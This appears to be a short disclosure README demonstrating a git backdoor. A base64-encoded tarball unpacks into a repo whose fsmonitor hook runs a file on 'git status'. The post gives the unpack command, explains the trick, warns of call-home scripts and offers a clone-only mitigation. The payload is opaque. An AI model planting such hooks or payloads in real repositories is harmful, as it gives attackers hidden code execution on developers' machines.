Example git backdoor

Readme.md

An innocuous example of a significant git backdoor.

Expanding the Base64 encoded tarball payload will result in a minimal example git repository.

base64 -di | tar xz

# (paste the base64 data, hit return, then press Ctrl+D)
# You will have a new repo folder called `ouchy`

Simply running git status inside of it will cause a file to be executed.

Exploit explained

This requires some configuration of the local repository to use the fsmonitor hook callback, and for an executable file to be present, so a plain clone should not carry such an item , but any script from a repo can introduce a surreptitious modification to a repository database which could in turn become a sleeper calling home, curling code, and downloading executable scripts.

Beware!

Mitigation

Only get git repositories via cloning, never via any regular file sync or archive !

ouch.tar.gz.base64

H4sIAAAAAAAAA+2YQU/CMBTHd+ZTPMEEvbC13dZEo8YoCWeJJ+NhjMKmQElbEvn2djPCQoIEQ2eQ
9zusB5a8jV//bd/kIs2WvueUwMJ5VIyER6Q6fuORiHAahiELAy8gAWPEg8jtY32x0CZRAJ5J8h/v
2/X7kSJL/51xbtxNgr38M2b9E8JD9F8HFf9y8CZSow8/D/bwzyjh1j+NaYT+66DiP03STLioUfqP
tvsnhK7yT1npn8SBB4GLh9nkxP23zvxBPvMHic4ajYthYsQ1iDST0OyJyUTC+XO/+9SB/kLNVa7F
EIwELQRMxV3zEm4hK+7qmA/T+Os3QX5DNf9yNsrHDmoUGY/jcPv6H67yzzgv9n/KYo75r4OXVCrx
2gDLSE/lLDdSwQ2sNwTM9b+mkv+BSmZW+OEPgPuc/wJOivzziOP5rw4q/nvd+0cnNXau/5Rv+Ccx
iXD9rwMlRldgL9rPRDLU/jTRRihc9E+FSv7LWeCixl79fxiX/R/D/r8Wvvwrm/2pKNo4FzV2n//J
+vsfLf0XA67/NdCCh0yk72AyYbeBudRFA7CEtv1XzEK3O7gTIAiCIAiCIAiCIMjx8wnOFLcPACgA
AA==